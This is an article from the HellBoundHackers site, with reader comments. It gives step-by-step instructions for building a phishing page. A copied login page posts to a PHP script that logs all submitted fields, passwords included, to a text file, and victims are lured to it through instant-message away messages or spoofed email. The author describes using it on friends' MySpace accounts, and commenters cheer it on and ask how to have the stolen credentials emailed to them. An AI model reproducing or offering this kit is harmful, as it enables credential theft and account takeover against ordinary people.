Follow us on Twitter!
Understanding is the answer, hatred is the problem, and hackers are the slaves abused and destroyed in the process of peace online - Deshouleres
Thursday, April 24, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 34
Guests Online: 28
Members Online: 6

Registered Members: 82903
Newest Member: Piriformis
Latest Articles

Phishing: Hook, Line, and Sucker

Arrow Image How to make a fake login page and how to get people to login there..



Phishing
------------------

Hey everbody! :) This is my first article so I'm sorry if it's horrible.


What we're going to talk about today is phishing. So what exactly is phishing? Well, phishing is getting someone to click on a link to a fake login page that you have made, and getting them to enter their information. You can get them to do this by spoofing an e-mail or sending it to them in an instant message or something. I have tried to make each step as easy to follow as possible so anyone can do it.

1. Decide who and where you want to get into. When I did this myself, I was trying to get into all of my friend's MySpace accounts. Then go to the website you chose, right-click, and View Source.

2. Save the source as login.html. Then open Notepad and paste the following into it:


foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;


Save as data.txt

3. Register at a free webhosting place that will let you use php. (I used 100webspace.com) Then register at a place that won't display advertisements on your site. (I used 50webs.com) It would be a good idea to try to login to the website your making a fake of but with a bad password. Copy the link for the error page.

4. Get a program that will let you save as .php (I used EditPlus2 from http://www.editplus.com) Open the program then copy and paste the following:


<?php
header("Location: someplace.html");
$handle = fopen("data.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Now, look at the second line of code. Do you notice '("Location: someplace.html")'? Change someplace.html to the error page. Save as log.php

5. Upload data.txt and log.php at the site that will let you use php. (100webspace.com) Then open login.html in Notepad.
Search for <form action="some file name"> Replace their file name with a link to your log.php.
Save and then upload login.html.

6. Test out your new login page. Load your data.txt from your website(yoururl.hostdomain/data.txt) and it should have your test login listed. You can re-uplod data.txt to get rid of your test login information.

Ok now that you have your fake login page done you need to get the people there. The method I chose to do was to make the page different and tell people it was a secret login page. I put it in my away message on AIM and told them if they logged in at that page they would see something cool. Another way is to spoof an email.

Hopefully this is helpful to some people. If there are any problems message me.

Good Luck,

Phoenix Rising

Comments

Conaman12on July 31 2006 - 00:00:31
Wow this is great!
Conaman12on July 31 2006 - 15:10:28
Believe me there are plenty of stupid people that will go for this
HopelessRomanticon July 31 2006 - 21:09:45
Great article, maybe it won't work on myspace that much anymore, but you could use it for other sites.
a-hackon August 05 2006 - 19:48:13
great article 10/10,couldn't you encode the url, or maybe not....
BradleyDodgeon December 16 2006 - 22:51:15
How do I find out the information my friends input? can someone tell me how i possibly view it? or have it sent to me via email?
Der Heiligenon December 31 2006 - 20:46:13
Believe me, it works on myspace. Most people don't think to check the url EVERY single time. So chances are that you'll get away with it.
Warsawon February 02 2007 - 02:37:59
great article, but just one thing. when i try and do a login with a fake password i dont get an error page on myspace.com. is this what you meant by patched grindordie?
aloteston May 04 2007 - 23:41:19
how do you get it into data.txt Im using exactly the same thing as you do
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.